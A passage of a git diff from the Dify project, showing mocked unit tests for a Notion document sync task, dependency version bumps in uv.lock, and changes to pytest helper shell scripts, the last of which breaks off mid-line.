dataset_id, document_id): + """Test that task raises error when notion_workspace_id is missing.""" + # Arrange + mock_document.data_source_info_dict = {"notion_page_id": "page123", "type": "page"} + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + + # Act & Assert + with pytest.raises(ValueError, match="no notion page found"): + document_indexing_sync_task(dataset_id, document_id) + + def test_missing_notion_page_id(self, mock_db_session, mock_document, dataset_id, document_id): + """Test that task raises error when notion_page_id is missing.""" + # Arrange + mock_document.data_source_info_dict = {"notion_workspace_id": "ws123", "type": "page"} + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + + # Act & Assert + with pytest.raises(ValueError, match="no notion page found"): + document_indexing_sync_task(dataset_id, document_id) + + def test_empty_data_source_info(self, mock_db_session, mock_document, dataset_id, document_id): + """Test that task raises error when data_source_info is empty.""" + # Arrange + mock_document.data_source_info_dict = None + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + + # Act & Assert + with pytest.raises(ValueError, match="no notion page found"): + document_indexing_sync_task(dataset_id, document_id) + + def test_credential_not_found( + self, + mock_db_session, + mock_datasource_provider_service, + mock_document, + dataset_id, + document_id, + ): + """Test that task handles missing credentials by updating document status.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document 
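+        # Simulate a deleted or revoked credential: the provider service
+        # lookup below returns None.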
+ mock_datasource_provider_service.get_datasource_credentials.return_value = None + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + assert mock_document.indexing_status == "error" + assert "Datasource credential not found" in mock_document.error + assert mock_document.stopped_at is not None + mock_db_session.commit.assert_called() + mock_db_session.close.assert_called() + + def test_page_not_updated( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + ): + """Test that task does nothing when page has not been updated.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + # Return same time as stored in document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Document status should remain unchanged + assert mock_document.indexing_status == "completed" + # No session operations should be performed beyond the initial query + mock_db_session.close.assert_not_called() + + def test_successful_sync_when_page_updated( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test successful sync flow when Notion page has been updated.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + # NotionExtractor returns updated time + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Verify document status was updated to parsing + assert mock_document.indexing_status == "parsing" + assert mock_document.processing_started_at is not None + + # Verify segments were cleaned + mock_processor = mock_index_processor_factory.return_value.init_index_processor.return_value + mock_processor.clean.assert_called_once() + + # Verify segments were deleted from database + for segment in mock_document_segments: + mock_db_session.delete.assert_any_call(segment) + + # Verify indexing runner was called + mock_indexing_runner.run.assert_called_once_with([mock_document]) + + # Verify session operations + assert mock_db_session.commit.called + mock_db_session.close.assert_called_once() + + def test_dataset_not_found_during_cleaning( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + ): + """Test that task handles dataset not found during cleaning phase.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, None] + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Document should still be set to parsing + assert mock_document.indexing_status == "parsing" + # Session should be closed after error + mock_db_session.close.assert_called_once() + + def test_cleaning_error_continues_to_indexing( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + 
mock_dataset, + mock_document, + dataset_id, + document_id, + ): + """Test that indexing continues even if cleaning fails.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.side_effect = Exception("Cleaning error") + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Indexing should still be attempted despite cleaning error + mock_indexing_runner.run.assert_called_once_with([mock_document]) + mock_db_session.close.assert_called_once() + + def test_indexing_runner_document_paused_error( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test that DocumentIsPausedError is handled gracefully.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + mock_indexing_runner.run.side_effect = DocumentIsPausedError("Document paused") + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Session should be closed after handling error + mock_db_session.close.assert_called_once() + + def test_indexing_runner_general_error( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test that general exceptions during indexing are handled.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + mock_indexing_runner.run.side_effect = Exception("Indexing error") + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + # Session should be closed after error + mock_db_session.close.assert_called_once() + + def test_notion_extractor_initialized_with_correct_params( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + notion_workspace_id, + notion_page_id, + ): + """Test that NotionExtractor is initialized with correct parameters.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" # No update + + # Act + with patch("tasks.document_indexing_sync_task.NotionExtractor") as mock_extractor_class: + mock_extractor = MagicMock() + mock_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + mock_extractor_class.return_value = mock_extractor + + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_extractor_class.assert_called_once_with( + notion_workspace_id=notion_workspace_id, + notion_obj_id=notion_page_id, + notion_page_type="page", + notion_access_token="test_token", + tenant_id=mock_document.tenant_id, + ) + + def 
test_datasource_credentials_requested_correctly( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + credential_id, + ): + """Test that datasource credentials are requested with correct parameters.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_datasource_provider_service.get_datasource_credentials.assert_called_once_with( + tenant_id=mock_document.tenant_id, + credential_id=credential_id, + provider="notion_datasource", + plugin_id="langgenius/notion_datasource", + ) + + def test_credential_id_missing_uses_none( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_document, + dataset_id, + document_id, + ): + """Test that task handles missing credential_id by passing None.""" + # Arrange + mock_document.data_source_info_dict = { + "notion_workspace_id": "ws123", + "notion_page_id": "page123", + "type": "page", + "last_edited_time": "2024-01-01T00:00:00Z", + } + mock_db_session.query.return_value.where.return_value.first.return_value = mock_document + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-01T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_datasource_provider_service.get_datasource_credentials.assert_called_once_with( + tenant_id=mock_document.tenant_id, + credential_id=None, + provider="notion_datasource", + plugin_id="langgenius/notion_datasource", + ) + + def test_index_processor_clean_called_with_correct_params( + self, + mock_db_session, + mock_datasource_provider_service, + mock_notion_extractor, + mock_index_processor_factory, + mock_indexing_runner, + mock_dataset, + mock_document, + mock_document_segments, + dataset_id, + document_id, + ): + """Test that index processor clean is called with correct parameters.""" + # Arrange + mock_db_session.query.return_value.where.return_value.first.side_effect = [mock_document, mock_dataset] + mock_db_session.scalars.return_value.all.return_value = mock_document_segments + mock_notion_extractor.get_notion_last_edited_time.return_value = "2024-01-02T00:00:00Z" + + # Act + document_indexing_sync_task(dataset_id, document_id) + + # Assert + mock_processor = mock_index_processor_factory.return_value.init_index_processor.return_value + expected_node_ids = [seg.index_node_id for seg in mock_document_segments] + mock_processor.clean.assert_called_once_with( + mock_dataset, expected_node_ids, with_keywords=True, delete_child_chunks=True + ) diff --git a/api/tests/unit_tests/utils/test_text_processing.py b/api/tests/unit_tests/utils/test_text_processing.py index 8bfc97ae63..11e017464a 100644 --- a/api/tests/unit_tests/utils/test_text_processing.py +++ b/api/tests/unit_tests/utils/test_text_processing.py @@ -8,10 +8,13 @@ from core.tools.utils.text_processing_utils import remove_leading_symbols [ ("...Hello, World!", "Hello, World!"), ("。测试中文标点", "测试中文标点"), - ("!@#Test symbols", "Test symbols"), + # Note: ! is not in the removal pattern, only @# are removed, leaving "!Test symbols" + # The pattern intentionally excludes ! 
as per #11868 fix + ("@#Test symbols", "Test symbols"), ("Hello, World!", "Hello, World!"), ("", ""), (" ", " "), + ("【测试】", "【测试】"), ], ) def test_remove_leading_symbols(input_text, expected_output): diff --git a/api/uv.lock b/api/uv.lock index 682f186a4a..27b30251d9 100644 --- a/api/uv.lock +++ b/api/uv.lock @@ -291,6 +291,22 @@ dependencies = [ ] sdist = { url = "https://files.pythonhosted.org/packages/32/eb/5e82e419c3061823f3feae9b5681588762929dc4da0176667297c2784c1a/alibabacloud_tea_xml-0.0.3.tar.gz", hash = "sha256:979cb51fadf43de77f41c69fc69c12529728919f849723eb0cd24eb7b048a90c", size = 3466, upload-time = "2025-07-01T08:04:55.144Z" } +[[package]] +name = "aliyun-log-python-sdk" +version = "0.9.37" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "dateparser" }, + { name = "elasticsearch" }, + { name = "jmespath" }, + { name = "lz4" }, + { name = "protobuf" }, + { name = "python-dateutil" }, + { name = "requests" }, + { name = "six" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/90/70/291d494619bb7b0cbcc00689ad995945737c2c9e0bff2733e0aa7dbaee14/aliyun_log_python_sdk-0.9.37.tar.gz", hash = "sha256:ea65c9cca3a7377cef87d568e897820338328a53a7acb1b02f1383910e103f68", size = 152549, upload-time = "2025-11-27T07:56:06.098Z" } + [[package]] name = "aliyun-python-sdk-core" version = "2.16.0" @@ -1293,6 +1309,21 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/c3/be/d0d44e092656fe7a06b55e6103cbce807cdbdee17884a5367c68c9860853/dataclasses_json-0.6.7-py3-none-any.whl", hash = "sha256:0dbf33f26c8d5305befd61b39d2b3414e8a407bedc2834dea9b8d642666fb40a", size = 28686, upload-time = "2024-06-09T16:20:16.715Z" }, ] +[[package]] +name = "dateparser" +version = "1.2.2" +source = { registry = "https://pypi.org/simple" } +dependencies = [ + { name = "python-dateutil" }, + { name = "pytz" }, + { name = "regex" }, + { name = "tzlocal" }, +] +sdist = { url = "https://files.pythonhosted.org/packages/a9/30/064144f0df1749e7bb5faaa7f52b007d7c2d08ec08fed8411aba87207f68/dateparser-1.2.2.tar.gz", hash = "sha256:986316f17cb8cdc23ea8ce563027c5ef12fc725b6fb1d137c14ca08777c5ecf7", size = 329840, upload-time = "2025-06-26T09:29:23.211Z" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/87/22/f020c047ae1346613db9322638186468238bcfa8849b4668a22b97faad65/dateparser-1.2.2-py3-none-any.whl", hash = "sha256:5a5d7211a09013499867547023a2a0c91d5a27d15dd4dbcea676ea9fe66f2482", size = 315453, upload-time = "2025-06-26T09:29:21.412Z" }, +] + [[package]] name = "decorator" version = "5.2.1" @@ -1337,9 +1368,10 @@ wheels = [ [[package]] name = "dify-api" -version = "1.10.1" +version = "1.11.1" source = { virtual = "." 
} dependencies = [ + { name = "aliyun-log-python-sdk" }, { name = "apscheduler" }, { name = "arize-phoenix-otel" }, { name = "azure-identity" }, @@ -1516,6 +1548,7 @@ vdb = [ { name = "clickzetta-connector-python" }, { name = "couchbase" }, { name = "elasticsearch" }, + { name = "intersystems-irispython" }, { name = "mo-vector" }, { name = "mysql-connector-python" }, { name = "opensearch-py" }, @@ -1537,6 +1570,7 @@ vdb = [ [package.metadata] requires-dist = [ + { name = "aliyun-log-python-sdk", specifier = "~=0.9.37" }, { name = "apscheduler", specifier = ">=3.11.0" }, { name = "arize-phoenix-otel", specifier = "~=0.9.2" }, { name = "azure-identity", specifier = "==1.16.1" }, @@ -1683,7 +1717,7 @@ dev = [ { name = "types-redis", specifier = ">=4.6.0.20241004" }, { name = "types-regex", specifier = "~=2024.11.6" }, { name = "types-setuptools", specifier = ">=80.9.0" }, - { name = "types-shapely", specifier = "~=2.0.0" }, + { name = "types-shapely", specifier = "~=2.1.0" }, { name = "types-simplejson", specifier = ">=3.20.0" }, { name = "types-six", specifier = ">=1.17.0" }, { name = "types-tensorflow", specifier = ">=2.18.0" }, @@ -1713,6 +1747,7 @@ vdb = [ { name = "clickzetta-connector-python", specifier = ">=0.8.102" }, { name = "couchbase", specifier = "~=4.3.0" }, { name = "elasticsearch", specifier = "==8.14.0" }, + { name = "intersystems-irispython", specifier = ">=5.1.0" }, { name = "mo-vector", specifier = "~=0.1.13" }, { name = "mysql-connector-python", specifier = ">=9.3.0" }, { name = "opensearch-py", specifier = "==2.4.0" }, @@ -2920,6 +2955,18 @@ wheels = [ { url = "https://files.pythonhosted.org/packages/cb/b1/3846dd7f199d53cb17f49cba7e651e9ce294d8497c8c150530ed11865bb8/iniconfig-2.3.0-py3-none-any.whl", hash = "sha256:f631c04d2c48c52b84d0d0549c99ff3859c98df65b3101406327ecc7d53fbf12", size = 7484, upload-time = "2025-10-18T21:55:41.639Z" }, ] +[[package]] +name = "intersystems-irispython" +version = "5.3.0" +source = { registry = "https://pypi.org/simple" } +wheels = [ + { url = "https://files.pythonhosted.org/packages/5d/56/16d93576b50408d97a5cbbd055d8da024d585e96a360e2adc95b41ae6284/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-macosx_10_9_universal2.whl", hash = "sha256:59d3176a35867a55b1ab69a6b5c75438b460291bccb254c2d2f4173be08b6e55", size = 6594480, upload-time = "2025-10-09T20:47:27.629Z" }, + { url = "https://files.pythonhosted.org/packages/99/bc/19e144ee805ea6ee0df6342a711e722c84347c05a75b3bf040c5fbe19982/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:56bccefd1997c25f9f9f6c4086214c18d4fdaac0a93319d4b21dd9a6c59c9e51", size = 14779928, upload-time = "2025-10-09T20:47:30.564Z" }, + { url = "https://files.pythonhosted.org/packages/e6/fb/59ba563a80b39e9450b4627b5696019aa831dce27dacc3831b8c1e669102/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3e160adc0785c55bb64e4264b8e99075691a15b0afa5d8d529f1b4bac7e57b81", size = 14422035, upload-time = "2025-10-09T20:47:32.552Z" }, + { url = "https://files.pythonhosted.org/packages/c1/68/ade8ad43f0ed1e5fba60e1710fa5ddeb01285f031e465e8c006329072e63/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win32.whl", hash = "sha256:820f2c5729119e5173a5bf6d6ac2a41275c4f1ffba6af6c59ea313ecd8f499cc", size = 2824316, 
upload-time = "2025-10-09T20:47:28.998Z" }, + { url = "https://files.pythonhosted.org/packages/f4/03/cd45cb94e42c01dc525efebf3c562543a18ee55b67fde4022665ca672351/intersystems_irispython-5.3.0-cp38.cp39.cp310.cp311.cp312.cp313-cp38.cp39.cp310.cp311.cp312.cp313-win_amd64.whl", hash = "sha256:fc07ec24bc50b6f01573221cd7d86f2937549effe31c24af8db118e0131e340c", size = 3463297, upload-time = "2025-10-09T20:47:34.636Z" }, +] + [[package]] name = "intervaltree" version = "3.1.0" @@ -6559,14 +6606,14 @@ wheels = [ [[package]] name = "types-shapely" -version = "2.0.0.20250404" +version = "2.1.0.20250917" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "numpy" }, ] -sdist = { url = "https://files.pythonhosted.org/packages/4e/55/c71a25fd3fc9200df4d0b5fd2f6d74712a82f9a8bbdd90cefb9e6aee39dd/types_shapely-2.0.0.20250404.tar.gz", hash = "sha256:863f540b47fa626c33ae64eae06df171f9ab0347025d4458d2df496537296b4f", size = 25066, upload-time = "2025-04-04T02:54:30.592Z" } +sdist = { url = "https://files.pythonhosted.org/packages/fa/19/7f28b10994433d43b9caa66f3b9bd6a0a9192b7ce8b5a7fc41534e54b821/types_shapely-2.1.0.20250917.tar.gz", hash = "sha256:5c56670742105aebe40c16414390d35fcaa55d6f774d328c1a18273ab0e2134a", size = 26363, upload-time = "2025-09-17T02:47:44.604Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/ce/ff/7f4d414eb81534ba2476f3d54f06f1463c2ebf5d663fd10cff16ba607dd6/types_shapely-2.0.0.20250404-py3-none-any.whl", hash = "sha256:170fb92f5c168a120db39b3287697fdec5c93ef3e1ad15e52552c36b25318821", size = 36350, upload-time = "2025-04-04T02:54:29.506Z" }, + { url = "https://files.pythonhosted.org/packages/e5/a9/554ac40810e530263b6163b30a2b623bc16aae3fb64416f5d2b3657d0729/types_shapely-2.1.0.20250917-py3-none-any.whl", hash = "sha256:9334a79339504d39b040426be4938d422cec419168414dc74972aa746a8bf3a1", size = 37813, upload-time = "2025-09-17T02:47:43.788Z" }, ] [[package]] @@ -6804,11 +6851,11 @@ wheels = [ [[package]] name = "urllib3" -version = "2.5.0" +version = "2.6.0" source = { registry = "https://pypi.org/simple" } -sdist = { url = "https://files.pythonhosted.org/packages/15/22/9ee70a2574a4f4599c47dd506532914ce044817c7752a79b6a51286319bc/urllib3-2.5.0.tar.gz", hash = "sha256:3fc47733c7e419d4bc3f6b3dc2b4f890bb743906a30d56ba4a5bfa4bbff92760", size = 393185, upload-time = "2025-06-18T14:07:41.644Z" } +sdist = { url = "https://files.pythonhosted.org/packages/1c/43/554c2569b62f49350597348fc3ac70f786e3c32e7f19d266e19817812dd3/urllib3-2.6.0.tar.gz", hash = "sha256:cb9bcef5a4b345d5da5d145dc3e30834f58e8018828cbc724d30b4cb7d4d49f1", size = 432585, upload-time = "2025-12-05T15:08:47.885Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/a7/c2/fe1e52489ae3122415c51f387e221dd0773709bad6c6cdaa599e8a2c5185/urllib3-2.5.0-py3-none-any.whl", hash = "sha256:e6b01673c0fa6a13e374b50871808eb3bf7046c4b125b216f6bf1cc604cff0dc", size = 129795, upload-time = "2025-06-18T14:07:40.39Z" }, + { url = "https://files.pythonhosted.org/packages/56/1a/9ffe814d317c5224166b23e7c47f606d6e473712a2fad0f704ea9b99f246/urllib3-2.6.0-py3-none-any.whl", hash = "sha256:c90f7a39f716c572c4e3e58509581ebd83f9b59cced005b7db7ad2d22b0db99f", size = 131083, upload-time = "2025-12-05T15:08:45.983Z" }, ] [[package]] @@ -6902,7 +6949,7 @@ wheels = [ [[package]] name = "wandb" -version = "0.23.0" +version = "0.23.1" source = { registry = "https://pypi.org/simple" } dependencies = [ { name = "click" }, @@ -6916,17 +6963,17 @@ dependencies = [ { name = "sentry-sdk" }, { name = "typing-extensions" }, ] 
-sdist = { url = "https://files.pythonhosted.org/packages/ef/8b/db2d44395c967cd452517311fd6ede5d1e07310769f448358d4874248512/wandb-0.23.0.tar.gz", hash = "sha256:e5f98c61a8acc3ee84583ca78057f64344162ce026b9f71cb06eea44aec27c93", size = 44413921, upload-time = "2025-11-11T21:06:30.737Z" } +sdist = { url = "https://files.pythonhosted.org/packages/0a/cc/770ae3aa7ae44f6792f7ecb81c14c0e38b672deb35235719bb1006519487/wandb-0.23.1.tar.gz", hash = "sha256:f6fb1e3717949b29675a69359de0eeb01e67d3360d581947d5b3f98c273567d6", size = 44298053, upload-time = "2025-12-03T02:25:10.79Z" } wheels = [ - { url = "https://files.pythonhosted.org/packages/41/61/a3220c7fa4cadfb2b2a5c09e3fa401787326584ade86d7c1f58bf1cd43bd/wandb-0.23.0-py3-none-macosx_12_0_arm64.whl", hash = "sha256:b682ec5e38fc97bd2e868ac7615a0ab4fc6a15220ee1159e87270a5ebb7a816d", size = 18992250, upload-time = "2025-11-11T21:06:03.412Z" }, - { url = "https://files.pythonhosted.org/packages/90/16/e69333cf3d11e7847f424afc6c8ae325e1f6061b2e5118d7a17f41b6525d/wandb-0.23.0-py3-none-macosx_12_0_x86_64.whl", hash = "sha256:ec094eb71b778e77db8c188da19e52c4f96cb9d5b4421d7dc05028afc66fd7e7", size = 20045616, upload-time = "2025-11-11T21:06:07.109Z" }, - { url = "https://files.pythonhosted.org/packages/62/79/42dc6c7bb0b425775fe77f1a3f1a22d75d392841a06b43e150a3a7f2553a/wandb-0.23.0-py3-none-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:4e43f1f04b98c34f407dcd2744cec0a590abce39bed14a61358287f817514a7b", size = 18758848, upload-time = "2025-11-11T21:06:09.832Z" }, - { url = "https://files.pythonhosted.org/packages/b8/94/d6ddb78334996ccfc1179444bfcfc0f37ffd07ee79bb98940466da6f68f8/wandb-0.23.0-py3-none-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e5847f98cbb3175caf5291932374410141f5bb3b7c25f9c5e562c1988ce0bf5", size = 20231493, upload-time = "2025-11-11T21:06:12.323Z" }, - { url = "https://files.pythonhosted.org/packages/52/4d/0ad6df0e750c19dabd24d2cecad0938964f69a072f05fbdab7281bec2b64/wandb-0.23.0-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:6151355fd922539926e870be811474238c9614b96541773b990f1ce53368aef6", size = 18793473, upload-time = "2025-11-11T21:06:14.967Z" }, - { url = "https://files.pythonhosted.org/packages/f8/da/c2ba49c5573dff93dafc0acce691bb1c3d57361bf834b2f2c58e6193439b/wandb-0.23.0-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:df62e426e448ebc44269140deb7240df474e743b12d4b1f53b753afde4aa06d4", size = 20332882, upload-time = "2025-11-11T21:06:17.865Z" }, - { url = "https://files.pythonhosted.org/packages/40/65/21bfb10ee5cd93fbcaf794958863c7e05bac4bbeb1cc1b652094aa3743a5/wandb-0.23.0-py3-none-win32.whl", hash = "sha256:6c21d3eadda17aef7df6febdffdddfb0b4835c7754435fc4fe27631724269f5c", size = 19433198, upload-time = "2025-11-11T21:06:21.913Z" }, - { url = "https://files.pythonhosted.org/packages/f1/33/cbe79e66c171204e32cf940c7fdfb8b5f7d2af7a00f301c632f3a38aa84b/wandb-0.23.0-py3-none-win_amd64.whl", hash = "sha256:b50635fa0e16e528bde25715bf446e9153368428634ca7a5dbd7a22c8ae4e915", size = 19433201, upload-time = "2025-11-11T21:06:24.607Z" }, - { url = "https://files.pythonhosted.org/packages/1c/a0/5ecfae12d78ea036a746c071e4c13b54b28d641efbba61d2947c73b3e6f9/wandb-0.23.0-py3-none-win_arm64.whl", hash = "sha256:fa0181b02ce4d1993588f4a728d8b73ae487eb3cb341e6ce01c156be7a98ec72", size = 17678649, upload-time = "2025-11-11T21:06:27.289Z" }, + { url = "https://files.pythonhosted.org/packages/12/0b/c3d7053dfd93fd259a63c7818d9c4ac2ba0642ff8dc8db98662ea0cf9cc0/wandb-0.23.1-py3-none-macosx_12_0_arm64.whl", hash = 
"sha256:358e15471d19b7d73fc464e37371c19d44d39e433252ac24df107aff993a286b", size = 21527293, upload-time = "2025-12-03T02:24:48.011Z" }, + { url = "https://files.pythonhosted.org/packages/ee/9f/059420fa0cb6c511dc5c5a50184122b6aca7b178cb2aa210139e354020da/wandb-0.23.1-py3-none-macosx_12_0_x86_64.whl", hash = "sha256:110304407f4b38f163bdd50ed5c5225365e4df3092f13089c30171a75257b575", size = 22745926, upload-time = "2025-12-03T02:24:50.519Z" }, + { url = "https://files.pythonhosted.org/packages/96/b6/fd465827c14c64d056d30b4c9fcf4dac889a6969dba64489a88fc4ffa333/wandb-0.23.1-py3-none-manylinux_2_28_aarch64.whl", hash = "sha256:6cc984cf85feb2f8ee0451d76bc9fb7f39da94956bb8183e30d26284cf203b65", size = 21212973, upload-time = "2025-12-03T02:24:52.828Z" }, + { url = "https://files.pythonhosted.org/packages/5c/ee/9a8bb9a39cc1f09c3060456cc79565110226dc4099a719af5c63432da21d/wandb-0.23.1-py3-none-manylinux_2_28_x86_64.whl", hash = "sha256:67431cd3168d79fdb803e503bd669c577872ffd5dadfa86de733b3274b93088e", size = 22887885, upload-time = "2025-12-03T02:24:55.281Z" }, + { url = "https://files.pythonhosted.org/packages/6d/4d/8d9e75add529142e037b05819cb3ab1005679272950128d69d218b7e5b2e/wandb-0.23.1-py3-none-musllinux_1_2_aarch64.whl", hash = "sha256:07be70c0baa97ea25fadc4a9d0097f7371eef6dcacc5ceb525c82491a31e9244", size = 21250967, upload-time = "2025-12-03T02:24:57.603Z" }, + { url = "https://files.pythonhosted.org/packages/97/72/0b35cddc4e4168f03c759b96d9f671ad18aec8bdfdd84adfea7ecb3f5701/wandb-0.23.1-py3-none-musllinux_1_2_x86_64.whl", hash = "sha256:216c95b08e0a2ec6a6008373b056d597573d565e30b43a7a93c35a171485ee26", size = 22988382, upload-time = "2025-12-03T02:25:00.518Z" }, + { url = "https://files.pythonhosted.org/packages/c0/6d/e78093d49d68afb26f5261a70fc7877c34c114af5c2ee0ab3b1af85f5e76/wandb-0.23.1-py3-none-win32.whl", hash = "sha256:fb5cf0f85692f758a5c36ab65fea96a1284126de64e836610f92ddbb26df5ded", size = 22150756, upload-time = "2025-12-03T02:25:02.734Z" }, + { url = "https://files.pythonhosted.org/packages/05/27/4f13454b44c9eceaac3d6e4e4efa2230b6712d613ff9bf7df010eef4fd18/wandb-0.23.1-py3-none-win_amd64.whl", hash = "sha256:21c8c56e436eb707b7d54f705652e030d48e5cfcba24cf953823eb652e30e714", size = 22150760, upload-time = "2025-12-03T02:25:05.106Z" }, + { url = "https://files.pythonhosted.org/packages/30/20/6c091d451e2a07689bfbfaeb7592d488011420e721de170884fedd68c644/wandb-0.23.1-py3-none-win_arm64.whl", hash = "sha256:8aee7f3bb573f2c0acf860f497ca9c684f9b35f2ca51011ba65af3d4592b77c1", size = 20137463, upload-time = "2025-12-03T02:25:08.317Z" }, ] [[package]] diff --git a/dev/pytest/pytest_all_tests.sh b/dev/pytest/pytest_all_tests.sh deleted file mode 100755 index 9123b2f8ad..0000000000 --- a/dev/pytest/pytest_all_tests.sh +++ /dev/null @@ -1,20 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." - -# ModelRuntime -dev/pytest/pytest_model_runtime.sh - -# Tools -dev/pytest/pytest_tools.sh - -# Workflow -dev/pytest/pytest_workflow.sh - -# Unit tests -dev/pytest/pytest_unit_tests.sh - -# TestContainers tests -dev/pytest/pytest_testcontainers.sh diff --git a/dev/pytest/pytest_artifacts.sh b/dev/pytest/pytest_artifacts.sh deleted file mode 100755 index 29cacdcc07..0000000000 --- a/dev/pytest/pytest_artifacts.sh +++ /dev/null @@ -1,9 +0,0 @@ -#!/bin/bash -set -x - -SCRIPT_DIR="$(dirname "$(realpath "$0")")" -cd "$SCRIPT_DIR/../.." 
- -PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-120}" - -pytest --timeout "${PYTEST_TIMEOUT}" api/tests/artifact_tests/ diff --git a/dev/pytest/pytest_full.sh b/dev/pytest/pytest_full.sh new file mode 100755 index 0000000000..2989a74ad8 --- /dev/null +++ b/dev/pytest/pytest_full.sh @@ -0,0 +1,58 @@ +#!/bin/bash +set -euo pipefail +set -ex + +SCRIPT_DIR="$(dirname "$(realpath "$0")")" +cd "$SCRIPT_DIR/../.." + +PYTEST_TIMEOUT="${PYTEST_TIMEOUT:-180}" + +# Ensure OpenDAL local storage works even if .env isn't loaded +export STORAGE_TYPE=${STORAGE_TYPE:-opendal} +export OPENDAL_SCHEME=${OPENDAL_SCHEME:-fs} +export OPENDAL_FS_ROOT=${OPENDAL_FS_ROOT:-/tmp/dify-storage} +mkdir -p "${OPENDAL_FS_ROOT}" + +# Prepare env files like CI +cp -n docker/.env.example docker/.env || true +cp -n docker/middleware.env.example docker/middleware.env || true +cp -n api/tests/integration_tests/.env.example api/tests/integration_tests/.env || true + +# Expose service ports (same as CI) without leaving the repo dirty +EXPOSE_BACKUPS=() +for f in docker/docker-compose.yaml docker/tidb/docker-compose.yaml; do + if [[ -f "$f" ]]; then + cp "$f" "$f.ci.bak" + EXPOSE_BACKUPS+=("$f") + fi +done +if command -v yq >/dev/null 2>&1; then + sh .github/workflows/expose_service_ports.sh || true +else + echo "skip expose_service_ports (yq not installed)" >&2 +fi + +# Optionally start middleware stack (db, redis, sandbox, ssrf proxy) to mirror CI +STARTED_MIDDLEWARE=0 +if [[ 